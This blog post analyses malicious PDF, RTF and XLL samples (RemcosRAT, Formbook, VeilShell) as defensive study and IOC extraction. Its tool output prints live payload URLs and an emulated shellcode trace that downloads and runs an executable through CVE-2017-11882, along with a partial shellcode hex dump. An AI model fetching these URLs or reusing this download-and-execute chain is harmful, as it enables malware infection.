Analyzing Eight Malicious Documents in a Single Day: Techniques, Tools, and Key Findings

By Vincent Dinh | Malware

After completing HackTheBox’s Malicious Document Analysis Module, I felt inspired to dive deeper into analyzing malicious documents independently. My goal was to analyze recent samples quickly, within a single day, using documents from MalwareBazaar. During this process, I extracted payloads and Indicators of Compromise (IoCs). This post covers PDFs, RTFs, and XLL add-ins from the RemcosRAT, Formbook, and VeilShell malware families.

The goal of this analysis was not only to uncover the methods used to embed and conceal malicious content but also to demonstrate the practical application of tools such as Peepdf, rtfdump.py, and Excel DNA.

Environment and Tools

I used the following setup for a controlled and efficient analysis:

  • VM Environment: REMnux for secure malware analysis
  • Windows VM: x64dbg, ExcelDNA, dnSpy, and PE-Bear
  • PDF Analysis: Tools like PDFiD, PDFParser, and Peepdf
  • Office Documents: oletools suite
  • RTF Analysis: rtfdump.py, scdbg, XORSearch
  • File Identification: trid

While most tools were pre-installed in REMnux, I added the plugin_biff.py add-on for advanced Excel file analysis.

Initial Triage and File Identification

Each document analysis began with an identification step using trid.

  • For example:
remnux@remnux:~/Downloads$ trid 9d02bf092fdcf44a51ae6e264ec3e3e57afbe79622c92a797e33fb62ed495cda.docx 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  18251
Analyzing...

Collecting data from file: 9d02bf092fdcf44a51ae6e264ec3e3e57afbe79622c92a797e33fb62ed495cda.docx
 52.2% (.DOCX) Word Microsoft Office Open XML Format document (23500/1/4)
 38.8% (.ZIP) Open Packaging Conventions container (17500/1/4)
  8.8% (.ZIP) ZIP compressed archive (4000/1)
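
As a rough illustration of what this identification step checks, the sketch below compares a file's leading bytes against a few well-known signatures. It is not how trid works internally (trid uses a large definition database); the `SIGNATURES` table and both function names are illustrative assumptions.

```python
# Minimal magic-byte triage. The signatures are well-known file headers;
# the table and function names are illustrative, not part of trid.
SIGNATURES = [
    (b"%PDF-", "PDF document"),
    (b"{\\rtf", "Rich Text Format"),
    (b"PK\x03\x04", "ZIP container (OOXML documents such as .docx are ZIPs)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy Office)"),
    (b"MZ", "PE executable or DLL (XLL add-ins are DLLs)"),
]


def identify(data: bytes) -> str:
    """Return a coarse file type based on the leading bytes."""
    for magic, label in SIGNATURES:
        if data.startswith(magic):
            return label
    return "unknown"


def identify_file(path: str) -> str:
    """Read only the first bytes of a file and classify them."""
    with open(path, "rb") as handle:
        return identify(handle.read(16))
```

A check like this ignores the file extension entirely, which matters because extensions on malicious documents are often misleading.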

PDF Analysis (RemcosRAT)

Remcos Remote Access Trojan (RemcosRAT) is designed to provide full remote control over infected systems. While it is marketed as a legitimate administration tool by its creators, it is frequently abused by cybercriminals for malicious purposes.

I chose RemcosRAT because I had heard of it and it had a signature on MalwareBazaar.

RemcosRAT Sample

trid 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  18251
Analyzing...

Collecting data from file: 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf
100.0% (.PDF) Adobe Portable Document Format (5000/1)
  • trid identified the sample as a PDF with a 100% match.

PDF-Parser and PDF-ID Analysis

Introduction to the Tools

pdfid.py: Identifies key characteristics of a PDF file, such as the presence of /JavaScript, /OpenAction, /ObjStm, and other potentially dangerous elements. With the -e flag, it also reports entropy to highlight suspicious embedded content.

pdf-parser.py is a Python-based tool that analyzes the internal structure of PDF files, providing detailed insights into potentially malicious content, objects, and metadata.

Execution of Commands and Results

PDFiD Analysis

  • The following command was used to analyze the sample file and extract key metadata:
  • The -e flag is particularly useful for obtaining entropy values, object types, and associated entries.
remnux@remnux:~/Downloads$ pdfid.py 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf -e
  • The analysis revealed the following:
PDFiD 0.2.8 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf
 PDF Header: %PDF-1.7
 obj                   14
 endobj                14
 stream                12
 endstream             12
 /ObjStm                1
 /AcroForm              1
 /URI                   0
 Total entropy:           7.975268 (36017 bytes)
 Entropy inside streams:  7.985894 (34262 bytes)
 Entropy outside streams: 0.000000 (1755 bytes)
  • Presence of /ObjStm indicates embedded object streams, which are often used to obfuscate malicious content.
  • /AcroForm detected, suggesting embedded interactive forms.
  • No /JavaScript or /OpenAction objects, reducing suspicion of common execution triggers.
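
To make the two measurements above more concrete, here is a minimal sketch of raw keyword counting and Shannon entropy. It is not PDFiD's implementation: it does not handle obfuscated names or split streams from non-stream data, and the `KEYWORDS` list and function names are assumptions chosen for illustration.

```python
import math
from collections import Counter

# Keywords of interest; an illustrative subset, not PDFiD's full list.
KEYWORDS = [b"/JavaScript", b"/OpenAction", b"/ObjStm", b"/AcroForm", b"/URI"]


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def count_keywords(data: bytes) -> dict:
    """Count raw occurrences of each keyword; compressed streams are not decoded."""
    return {keyword.decode(): data.count(keyword) for keyword in KEYWORDS}
```

An entropy close to 8 bits per byte, as reported inside the streams of this sample, is what compressed or encrypted data looks like. Because the counting runs over raw bytes, anything stored inside a compressed stream stays invisible to it.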

PDF-Parser Analysis

The pdf-parser.py tool was then employed to investigate specific objects within the file further:

remnux@remnux:~/Downloads$ pdf-parser.py 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf

The output focused on objects of interest:

obj 2 0
 Type: /Catalog
 Referencing: 4 0 R, 5 0 R
 <<
   /Type /Catalog
   /Pages 4 0 R
   /AcroForm 5 0 R
 >>

obj 1 0
 Type: /ObjStm
 Referencing: 29 0 R
 Contains stream
 <<
   /Type /ObjStm
   /N 16
   /First 103
   /Filter /FlateDecode
   /Length 29 0 R
 >>

obj 21 0
 Type: /XObject
 Referencing: 24 0 R
 Contains stream
 <<
   /Type /XObject
   /Subtype /Image
   /Width 900
   /Height 1164
   /BitsPerComponent 8
   /ColorSpace /DeviceGray
   /Filter [/FlateDecode /DCTDecode]
   /Length 13634
 >>

obj 30 0
 Type: /XRef
 Referencing: 2 0 R, 3 0 R
 Contains stream
 <<
   /Size 31
   /Root 2 0 R
   /Info 3 0 R
   /ID [<E8B47CAEFEC9840FFA878719DAE58EAF> <E8B47CAEFEC9840FFA878719DAE58EAF>]
   /Type /XRef
   /Filter /FlateDecode
   /Length 100
 >>
  • As of right now, we are primarily concerned with the /AcroForm and /ObjStm entries. To look inside the object stream, we can run pdf-parser.py with the --objstm option, which parses the objects stored in the stream.
  • PDFiD reported /URI 0 because it does not decompress object streams. The --objstm output below shows a /URI action linking to external content stored inside object 1, which warrants further investigation.
  • ObjStm: An object stream in PDFs that contains multiple compressed objects to optimize file size and structure.
  • AcroForm: A PDF structure that enables interactive forms, such as text fields, checkboxes, and buttons, for user input.
remnux@remnux:~/Downloads$ pdf-parser.py 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf --objstm
PDF Comment '%PDF-1.7\n'

obj 15 0
 Containing /ObjStm: 1 0
 Type: 
 Referencing: 19 0 R, 20 0 R

  <<
    /Helv 19 0 R
    /ZaDb 20 0 R
  >>

obj 16 0
 Containing /ObjStm: 1 0
 Type: 
 Referencing: 21 0 R, 22 0 R, 23 0 R

  <<
    /X0 21 0 R
    /Im2 22 0 R
    /Im3 23 0 R
  >>

obj 17 0
 Containing /ObjStm: 1 0
 Type: /Action
 Referencing: 

  <<
    /Type /Action
    /S /URI
    /URI (https://2012.filemail.com/api/file/get?filekey=ytyQUUZwEeijkbLbKoMvyf0YvBoqUg4Fufe6zGM0dPsUyU-wFFP0pUcwI9xAZPaEI-rrsI6M0JRZ03-gDQ&pk_vid=0036e245a09a84ae173430670396c326)
  >>

obj 18 0
 Containing /ObjStm: 1 0
 Type: 
 Referencing: 

  <<
    /W 0
  >>
  • Object 2 is the document catalog: it references the page tree (object 4) and the /AcroForm dictionary (object 5), suggesting interactive forms.
  • /ObjStm (object 1) compresses multiple objects, obfuscating their true nature.
  • Object 17 contains a /URI, pointing to an external link likely used to deliver a malicious payload.
  • To evaluate whether the /AcroForm is malicious, Peepdf was used because of its object mapping and interactive analysis capabilities.
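
To illustrate how an object stream hides objects such as the /URI action in object 17, the sketch below unpacks one by hand. It assumes the raw stream bytes have already been extracted, that the only filter is /FlateDecode without a predictor, and that /N and /First are read from the stream dictionary; `parse_objstm` is an illustrative name, not a pdf-parser.py function.

```python
import zlib


def parse_objstm(compressed: bytes, n: int, first: int) -> dict:
    """Decompress an /ObjStm body and return {object_number: raw_object_bytes}.

    The decompressed stream starts with n pairs of integers
    (object number, offset relative to `first`), followed by the objects.
    """
    data = zlib.decompress(compressed)
    header = data[:first].split()
    pairs = [(int(header[i]), int(header[i + 1])) for i in range(0, 2 * n, 2)]
    objects = {}
    for index, (obj_num, offset) in enumerate(pairs):
        start = first + offset
        # Each object ends where the next one begins (or at end of stream).
        end = first + pairs[index + 1][1] if index + 1 < len(pairs) else len(data)
        objects[obj_num] = data[start:end].strip()
    return objects
```

For this sample, the dictionary of object 1 gives /N 16 and /First 103, so those are the values that would be passed in once the stream bytes are extracted.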

Peepdf Object Analysis

remnux@remnux:~/Downloads$ peepdf 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf -i 
File: 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf
MD5: 403e27e527baabeb53ef83b99c4cadee
SHA1: 44d2696a0a31ce7c15553bf88e1605e67a4e6545
SHA256: 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594
Size: 36017 bytes
IDs: 
 Version 0: [ <E8B47CAEFEC9840FFA878719DAE58EAF> <E8B47CAEFEC9840FFA878719DAE58EAF> ]

PDF Format Version: 1.7
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 30
Streams: 12
URIs: 1
Comments: 0
Errors: 0

Version 0:
 Catalog: 2
 Info: 3
 Objects (30): [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
 Compressed objects (16): [3, 4, 5, 6, 7, 8, 14, 15, 16, 17, 18, 19, 20, 24, 25, 27]
 Streams (12): [1, 9, 10, 11, 12, 13, 21, 22, 23, 26, 28, 30]
 Xref streams (1): [30]
 Object streams (1): [1]
 Encoded (12): [1, 9, 10, 11, 12, 13, 21, 22, 23, 26, 28, 30]
 Objects with URIs (1): [17]
 Suspicious elements (1):
  /AcroForm (1): [2]
PPDF> object 2

<< /Type /Catalog
/Pages 4 0 R
/AcroForm 5 0 R >>

PPDF> object 4

<< /Type /Pages
/Kids [ 6 0 R ]
/Count 1 >>

PPDF> object 17

<< /Type /Action
/S /URI
/URI https://2012.filemail.com/api/file/get?filekey=ytyQUUZwEeijkbLbKoMvyf0YvBoqUg4Fufe6zGM0dPsUyU-wFFP0pUcwI9xAZPaEI-rrsI6M0JRZ03-gDQ&pk_vid=0036e245a09a84ae173430670396c326 >>
  • Object 2 (the catalog carrying the /AcroForm key) and object 17 (/URI) were prioritized for further analysis.
  • peepdf -i flagged /AcroForm as a suspicious element in object 2, the catalog, which also references the page tree in object 4. Upon further analysis, the /AcroForm was determined to be benign. Object 17, which contains the /URI action, is the likely delivery mechanism for the RemcosRAT payload.

The malicious PDF is crafted to deliver RemcosRAT, a remote access trojan used for full control over infected systems. It stores the /URI action inside a compressed /ObjStm object stream, which conceals the link from simple keyword scans. With no /JavaScript or /OpenAction present, the document most likely relies on the user clicking the link, which downloads the RemcosRAT payload and enables attackers to gain unauthorized remote access, steal credentials, and monitor the victim's system.

  • IOCs: hxxps[://]2012[.]filemail[.]com/api/file/get?filekey=ytyQUUZwEeijkbLbKoMvyf0YvBoqUg4Fufe6zGM0dPsUyU-wFFP0pUcwI9xAZPaEI-rrsI6M0JRZ03-gDQ&pk_vid=0036e245a09a84ae173430670396c326
[Image: VirusTotal comment]
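
The IOCs in this post are written in defanged form so they cannot be clicked by accident. A minimal sketch of that convention, with `defang` and `refang` as illustrative helper names, could look like this:

```python
def defang(url: str) -> str:
    """Defang a URL in the style used for the IOCs in this post."""
    scheme, separator, rest = url.partition("://")
    if not separator:
        # No scheme present: only neutralize the dots.
        return url.replace(".", "[.]")
    return scheme.replace("http", "hxxp", 1) + "[://]" + rest.replace(".", "[.]")


def refang(ioc: str) -> str:
    """Reverse defang() so the indicator can be fed to tooling."""
    return ioc.replace("[://]", "://").replace("[.]", ".").replace("hxxp", "http", 1)
```

Refanging is only needed when an indicator is passed to a tool that expects a real URL; reports and tickets are safer with the defanged form.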

RTF Analysis (Formbook)

What are RTFs?

Although RTF is primarily a benign document format, it is frequently exploited by attackers due to its ability to embed objects and payloads.

  • RTFs can include OLE objects (e.g., executables or scripts) to deliver malware.
  • Older vulnerabilities like CVE-2017-11882 (Microsoft Equation Editor flaw) are commonly targeted.
  • Shellcode is embedded in RTF objects to exploit software parsing the file.

Formbook is a data-stealing malware known for targeting credentials, keystrokes, and other sensitive information. It’s often spread through malicious documents and uses obfuscation to avoid detection while quietly collecting data from infected systems.

Formbook RTF Sample

  • Threat actors may rename .rtf extensions to .doc to ensure the file opens in Microsoft Word, although in this case, the file remains in the .rtf format.
trid e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  18251
Analyzing...

Collecting data from file: e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf
100.0% (.RTF) Rich Text Format (5000/1)

rtfdump and CVE-2017-11882

The tool rtfdump.py is instrumental in analyzing Rich Text Format (RTF) files, breaking them into individual objects for detailed inspection.

  • Let’s run rtfdump.py to list the objects present.
remnux@remnux:~/Downloads$ rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf 
    1 Level  1        c=    2 p=00000000 l=  825268 h=  193697;      18 b=       0   u=  248526 \rtf1
    2  Level  2       c=    0 p=00000008 l=     227 h=       0;       5 b=       0   u=       0 
    3  Level  2       c=    1 p=000000ef l=  825028 h=  193697;      18 b=       0   u=  248526 
    4   Level  3      c=    3 p=00076b73 l=  339007 h=    3722;      18 b=       0   u=     369 \*\objdata878984
    5    Level  4     c=    0 p=00076b84 l=      23 h=       0;       2 b=       0   u=       1 \*\mchr
    6    Level  4     c=    0 p=00076b9f l=     617 h=     200;      18 b=       0   u=     368 \*\xmlattr615232522
    7    Level  4     c=    0 p=00076e0c l=      57 h=       0;       4 b=       0   u=       0 \*\aexpnd615232522
  • In this listing, item 4 stands out: the control word on the far right is \*\objdata, which marks embedded object data.
  • To investigate item 4 further, it was selected with -s 4 and hex-decoded with -H, which prints the decoded bytes as a hex dump.
remnux@remnux:~/Downloads$ rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf -s 4 -H | more
00000000: 51 D2 FC BE E6 ED 56 D8  B4 DD F0 D7 33 71 E6 BB  Q.....V.....3q..
00000010: 2C 8E 88 B2 B2 C4 ED E9  CA D4 65 FE 1E EA CE E9  ,.........e.....
00000020: 9C BE F3 DB 88 BD ED 2B  AD F1 93 85 62 BA BC F9  .......+....b...
00000030: 62 CB B3 2E D7 E1 2D B7  BC AF BE 8C 9C AC B6 22  b.....-........"
00000040: 1F A5 AD A5 38 B6 21 DE  6B E1 77 CD 23 BA 6E 58  ....8.!.k.w.#.nX
00000050: 4D C3 F7 3E 3F 88 ED 9C  F4 BD ED F2 AE AA 60 F1  M..>?.........`.
00000060: D4 BA AC AE 80 D0 F1 78  02 00 00 00 0B 00 00 00  .......x........
00000070: 45 51 55 61 74 49 4F 4E  2E 33 00 00 00 00 00 00  EQUatION.3......
00000080: 00 00 00 B6 06 00 00 02  7E F7 EB 47 6C 01 05 77  ........~..Gl..w
00000090: 59 ED EC C9 00 00 00 00  00 00 00 00 00 00 00 00  Y...............
000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 50 06 45 00  ............P.E.
000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 29 C3 44 00  ............).D.
000000D0: 00 00 00 E9 4F 01 00 00  BE C9 34 F8 6D 83 8F 96  ....O.....4.m...
000000E0: 3C 38 CA D8 3B 63 9A 73  14 04 6A 3F 3F DA 98 78  <8..;c.s..j??..x
000000F0: 4D AD B2 FE 20 85 C0 96  33 F6 7B 28 CC 4B 90 00  M... ...3.{(.K..
00000100: 4E E1 E0 0E 6B 4C BE 27  6B AF 37 43 67 EB 47 BF  N...kL.'k.7Cg.G.
00000110: 92 E5 1F 99 6A C7 64 B8  0C 42 6F 22 5F C6 8D 43  ....j.d..Bo"_..C
00000120: 66 CA 42 2E 6F 08 7F D5  66 BD F1 51 06 EE 33 1E  f.B.o...f..Q..3.
00000130: 1A 9F 18 5D CA 1A E3 12  CC 30 8F 64 A9 70 08 DF  ...].....0.d.p..
00000140: 01 73 71 B7 C9 13 5E FC  89 AB 18 E7 98 60 DD 17  .sq...^......`..
  • This revealed the keyword EQUatION.3, indicating a link to CVE-2017-11882. This vulnerability is associated with the Microsoft Equation Editor and has been widely exploited in numerous malware samples by embedding shellcode within objects to execute arbitrary code.
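
The hex-decoding step can be sketched in a few lines. This is a deliberately naive approximation of what rtfdump.py -H does: it assumes the \objdata group contains only hex digits and whitespace, whereas real samples (including this one, with its nested groups) need rtfdump.py's proper parsing. Both function names are illustrative.

```python
import re


def hexdecode_objdata(group_text: str) -> bytes:
    """Decode the hex payload of an \\objdata group, ignoring whitespace."""
    # Drop the leading control word (e.g. \*\objdata878984) if present.
    body = re.sub(r"^\s*\{?\\\*\\objdata\d*", "", group_text)
    digits = re.sub(r"[^0-9A-Fa-f]", "", body)
    if len(digits) % 2:
        digits = digits[:-1]  # ignore a dangling half byte
    return bytes.fromhex(digits)


def find_equation_marker(blob: bytes) -> int:
    """Return the offset of a case-insensitive 'equation.3' class name, or -1."""
    return blob.lower().find(b"equation.3")
```

The search is case-insensitive because samples often vary the casing of the class name, as the EQUatION.3 string in this dump shows.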
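Analysis of CVE-2017-11882 Exploit in the Wild
  • format-bytes.py, which breaks down structured binary data for easier interpretation, is used here with its Microsoft Equation Editor format (name=eqn1), where the header fields often reveal whether shellcode or a command is embedded in the font name record. Note that the command below omits rtfdump.py's --dump flag, so format-bytes.py receives the textual hex dump rather than the raw object bytes: the fields are parsed from the ASCII characters of the dump (0x30 is '0', 0x20 is a space), and the values shown should be read with that in mind.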
remnux@remnux:~/Downloads$ rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf -s 4 -H | format-bytes.py -f name=eqn1
 1:   <class 'int'>       3030 size of EQNOLEFILEHDR
 2:   <class 'int'>   30303030 
 3:   <class 'int'>       3030 
 4:   <class 'int'>   3135203a 
 5:   <class 'int'>   20324420 
 6:   <class 'int'>   42204346 
 7:   <class 'int'>   36452045 
 8:   <class 'int'>   20444520 
 9:   <class 'int'>         35 Start MTEF header
10:   <class 'int'>         36 
11:   <class 'int'>         20 
12:   <class 'int'>         44 
13:   <class 'int'>         38 
14:   <class 'int'>         20 Full size record
15:   <class 'int'>         20 Line record
16:   <class 'int'>         42 Font record
17:   <class 'int'>         34 
18:   <class 'int'>         20 
19: <class 'bytes'>         40 DD F0 D7 3 b'44442046302044372033' 3.258695 5f303dc2df13765f98b2dace4620c1cd Shellcode/Command (fontname)
20:   <class 'int'>   30303030 
21:   <class 'int'>   3a303130 
22:   <class 'int'>         20 
23:   <class 'int'>         32 
Remainder: 8910
00000000: 43 20 38 45 20 38 38 20  42 32 20 42 32 20 43 34  C 8E 88 B2 B2 C4
00000010: 20 45 44 20 45 39 20 20  43 41 20 44 34 20 36 35   ED E9  CA D4 65
00000020: 20 46 45 20 31 45 20 45  41 20 43 45 20 45 39 20   FE 1E EA CE E9 
00000030: 20 2C 2E 2E 2E 2E 2E 2E  2E 2E 2E 65 2E 2E 2E 2E   ,.........e....
00000040: 2E 0A 30 30 30 30 30 30  32 30 3A 20 39 43 20 42  ..00000020: 9C B
00000050: 45 20 46 33 20 44 42 20  38 38 20 42 44 20 45 44  E F3 DB 88 BD ED
00000060: 20 32 42 20 20 41 44 20  46 31 20 39 33 20 38 35   2B  AD F1 93 85
00000070: 20 36 32 20 42 41 20 42  43 20 46 39 20 20 2E 2E   62 BA BC F9  ..
00000080: 2E 2E 2E 2E 2E 2B 2E 2E  2E 2E 62 2E 2E 2E 0A 30  .....+....b....0
00000090: 30 30 30 30 30 33 30 3A  20 36 32 20 43 42 20 42  0000030: 62 CB B
000000A0: 33 20 32 45 20 44 37 20  45 31 20 32 44 20 42 37  3 2E D7 E1 2D B7
000000B0: 20 20 42 43 20 41 46 20  42 45 20 38 43 20 39 43    BC AF BE 8C 9C
000000C0: 20 41 43 20 42 36 20 32  32 20 20 62 2E 2E 2E 2E   AC B6 22  b....
000000D0: 2E 2D 2E 2E 2E 2E 2E 2E  2E 2E 22 0A 30 30 30 30  .-........".0000
000000E0: 30 30 34 30 3A 20 31 46  20 41 35 20 41 44 20 41  0040: 1F A5 AD A
000000F0: 35 20 33 38 20 42 36 20  32 31 20 44 45 20 20 36  5 38 B6 21 DE  6

1I: s 67 u 67
2I: sl 8259 ul 8259 sb 17184 ub 17184
4I: sl 1161306179 ul 1161306179 sb 1126185029 ub 1126185029
4F: l 2946.016357 b 160.219803
4N: b 67.32.56.69 l 69.56.32.67
4E: l 2006/10/20 01:02:59 b 2005/09/08 13:10:29
8I: sl 2321667319160905795 ul 2321667319160905795 sb 4836927869340366880 ub 4836927869340366880
8T: ul 8958/01/26 22:51:56.0905795 ub N/A
8F: l 0.000000 b 2282734585912336.000000
16G: b 43203845-2038-3820-4232-204232204334 m {45382043-3820-2038-4232-204232204334}

Once the presence of shellcode was confirmed, the next steps included extracting the shellcode, locating its entry point, and simulating its execution using scdbg.

Dumping the Shellcode

  • Object 4 was selected for analysis using the hexdecode and dump flags to extract its content into a shellcode file.
rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf -s 4 --hexdecode --dump > formbookrtf.sc
  • Subsequently, XORSearch was employed with the -W flag, leveraging its built-in rules to identify the entry point within the shellcode file.
remnux@remnux:~/Downloads$ xorsearch -W formbookrtf.sc 
Found XOR 00 position 0000025D: GetEIP method 2 EB09
Found ROT 25 position 0000025D: GetEIP method 2 EB09
Found ROT 24 position 0000025D: GetEIP method 2 EB09
Found ROT 23 position 0000025D: GetEIP method 2 EB09
Score: 260
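
The brute-force idea behind this kind of search can be sketched as follows. This is not XORSearch's implementation and it does not include the wildcard GetEIP rules; it only shows single-byte XOR matching of a fixed pattern, and `xor_search` is an illustrative name.

```python
def xor_search(data: bytes, needle: bytes):
    """Yield (key, offset) for every single-byte XOR key under which needle appears.

    Instead of decoding the whole buffer 256 times, the needle is encoded
    with each key and searched for in the untouched data.
    """
    for key in range(256):
        encoded = bytes(value ^ key for value in needle)
        offset = data.find(encoded)
        while offset != -1:
            yield key, offset
            offset = data.find(encoded, offset + 1)
```

A hit with key 0x00, like the "XOR 00" line above, simply means the pattern is present without any XOR encoding.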
  • To further examine the shellcode’s behavior, scdbg was run with the /foff option to emulate execution starting at the identified offset (0x25D).
scdbg /f formbookrtf.sc /foff 0x25D
  • The output lists the Windows API calls made by the shellcode during emulation, which provide critical insight into its intended functionality:
  • GetProcAddress / ExpandEnvironmentStringsW: Resolves the drop path %APPDATA%\yhndfreshkl89221.exe. The AppData folder is writable by the current user and hidden by default.
  • LoadLibraryW / URLDownloadToFileW: Loads a system library (urlmon.dll) and uses the URLDownloadToFileW function to download a file from hxxps[://]ftvproclad[.]top/wyfRlocEnjsHiix[.]exe to that path.
  • CreateProcessW: Executes the downloaded file.
  • ExitProcess: Terminates the process hosting the shellcode.
4014fc GetProcAddress(ExpandEnvironmentStringsW)
40154b ExpandEnvironmentStringsW(%APPDATA%\yhndfreshkl89221.exe, dst=12fb84, sz=104)
401560 LoadLibraryW(UrlMon)
40157b GetProcAddress(URLDownloadToFileW)
4015e3 URLDownloadToFileW(https://ftvproclad.top/wyfRlocEnjsHiix.exe, C:\users\remnux\Application Data\yhndfreshkl89221.exe)
4015fb GetProcAddress(GetStartupInfoW)
401605 GetStartupInfoW(12fda4)
40161c GetProcAddress(CreateProcessW)
401641 CreateProcessW( , C:\users\remnux\Application Data\yhndfreshkl89221.exe ) = 0x1269
401655 GetProcAddress(ExitProcess)
401659 ExitProcess(0)
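
When several samples are processed in a day, it helps to pull API calls and URLs out of the emulator log automatically. The sketch below assumes the log keeps the "address API(arguments)" line shape shown above; the regular expressions and the `parse_scdbg_log` name are illustrative assumptions, not part of scdbg.

```python
import re

# '<hex address> <ApiName>(<arguments>)', optionally followed by a return value.
CALL_RE = re.compile(r"^([0-9a-fA-F]+)\s+(\w+)\((.*)\)")
URL_RE = re.compile(r"https?://[^\s,)]+")


def parse_scdbg_log(text: str):
    """Return (api_calls, urls) extracted from scdbg-style output lines."""
    calls, urls = [], []
    for line in text.splitlines():
        match = CALL_RE.match(line.strip())
        if not match:
            continue
        address, api, args = match.groups()
        calls.append((int(address, 16), api, args.strip()))
        urls.extend(URL_RE.findall(args))
    return calls, urls
```

The extracted URLs can then be defanged and recorded as IOCs, while the ordered list of API names gives a quick summary of the download-and-execute chain.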

The RTF document exploits CVE-2017-11882, a vulnerability in Microsoft Equation Editor, to execute the shellcode embedded within the file. The shellcode downloads and executes an additional payload, enabling the attacker to install Formbook, a credential-stealing malware. Formbook captures sensitive data, such as keystrokes and credentials, and uses obfuscation to avoid detection.

IOCs: hxxps[://]ftvproclad[.]top/wyfRlocEnjsHiix[.]exe

SHA256: 99544c011500dbc38b972fc49587047eb94ecfba56985fd3c9f59dd684dbf97b

XLL Analysis (VeilShell)

VeilShell XLL Sample

What are XLLs?

XLL add-ins are specialized DLLs designed exclusively for Microsoft Excel. While less common than malicious macros or documents, XLLs possess unique capabilities that make them attractive to attackers:

  • Bypass Macro Restrictions: XLLs are not subject to Excel’s macro security settings.
  • Evasion of Security Tools: XLLs can bypass detection mechanisms more effectively than traditional macros.
  • Platform-Specific Complexity: Unlike VBA macros, which work across Word and Excel, XLLs are exclusive to Excel and inherently more complex.
[Image: Pop-up asking the user to enable the add-in]
  • When loaded, XLL files prompt users to enable the add-in. This process often occurs with fewer warnings compared to VBA macros, making XLLs particularly dangerous as they execute with minimal user intervention.

xlAutoOpen export

An analysis of multiple .xll samples from Malware Bazaar reveals that the xlAutoOpen export is a consistent feature in both legitimate and malicious XLLs. As this function is automatically executed when an XLL is loaded, attackers use it as an entry point to embed malicious code, enabling activities such as shellcode decryption or malware downloads.

x64dbg analysis of the xlAutoOpen Export

Initial Inspection (PE-BEAR)

XLLs are usually developed in C/C++, or in C# through frameworks such as Excel DNA that extend Excel’s functionality with .NET code. The initial inspection in PE-BEAR indicated that this sample was built with Excel DNA, as a significant number of malicious XLLs are, which called for further analysis using ExcelDNA-Unpack.

ExcelDNA and ExcelDNA-Unpack

ExcelDNA-Unpack is a tool designed to extract the contents of Excel add-ins (XLL files) created with the Excel DNA framework.

C:\Users\vboxuser\Downloads\exceldna-unpack-2.1.0-win7-x64\exceldna-unpack.exe -xllFile=C:\Users\vboxuser\Documents\7e9f91f0cfe3769df30608a88091ee19bc4cf52e8136157e4e0a5b6530d510ec.xll
Excel-DNA Unpack Tool, version 2.1.0+60b3d6031babfd276f540b95f9fb298c18342a00

Analyzing 7e9f91f0cfe3769df30608a88091ee19bc4cf52e8136157e4e0a5b6530d510ec.xll . . . OK

Extracting EXCELDNA.LOADER.dll (ASSEMBLY) . . . OK
Extracting EXCELDNA.INTEGRATION.dll (ASSEMBLY_LZMA) . . . OK
Extracting EXCELDNAPROJECTDEMO.dll (ASSEMBLY_LZMA) . . . OK
Extracting __MAIN__.dna (DNA) . . . OK
__MAIN__.dna can be opened in any text editor to view the add-in's configuration.
  • The extracted components include critical elements like the loader (EXCELDNA.LOADER.dll), integration libraries, and a project-specific DLL, all of which can be reverse-engineered for deeper analysis.
  • Once unpacked, the file specified in the ExternalLibrary Path attribute of __MAIN__.dna should be opened in dnSpy, a .NET decompiler and debugger used to analyze compiled .NET applications.
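
Since the .dna file is XML, the ExternalLibrary entries can also be listed with a short script instead of a text editor. This is a minimal sketch: `external_libraries` is an illustrative name, and the sample document in the usage note is hypothetical rather than the content of this sample's __MAIN__.dna.

```python
import xml.etree.ElementTree as ET


def external_libraries(dna_xml) -> list:
    """Return the Path attribute of every ExternalLibrary element in a .dna file.

    Accepts the file content as str or bytes.
    """
    root = ET.fromstring(dna_xml)
    paths = []
    for element in root.iter():
        # Strip an optional XML namespace prefix such as '{http://...}'.
        tag = element.tag.rsplit("}", 1)[-1]
        if tag == "ExternalLibrary" and "Path" in element.attrib:
            paths.append(element.attrib["Path"])
    return paths
```

For a hypothetical file containing `<DnaLibrary><ExternalLibrary Path="ExcelDnaProjectDemo.dll" /></DnaLibrary>`, the function returns a one-element list with that path, which is the assembly to open in the decompiler.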

Examining Excel DNA in dnSpy

The extracted ExcelDnaProjectDemo.dll was loaded into dnSpy, a .NET decompiler, for detailed inspection.

